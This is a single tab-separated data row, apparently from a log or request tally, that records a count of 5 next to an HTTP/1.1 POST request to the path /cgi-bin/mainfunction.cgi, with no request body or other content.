5	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1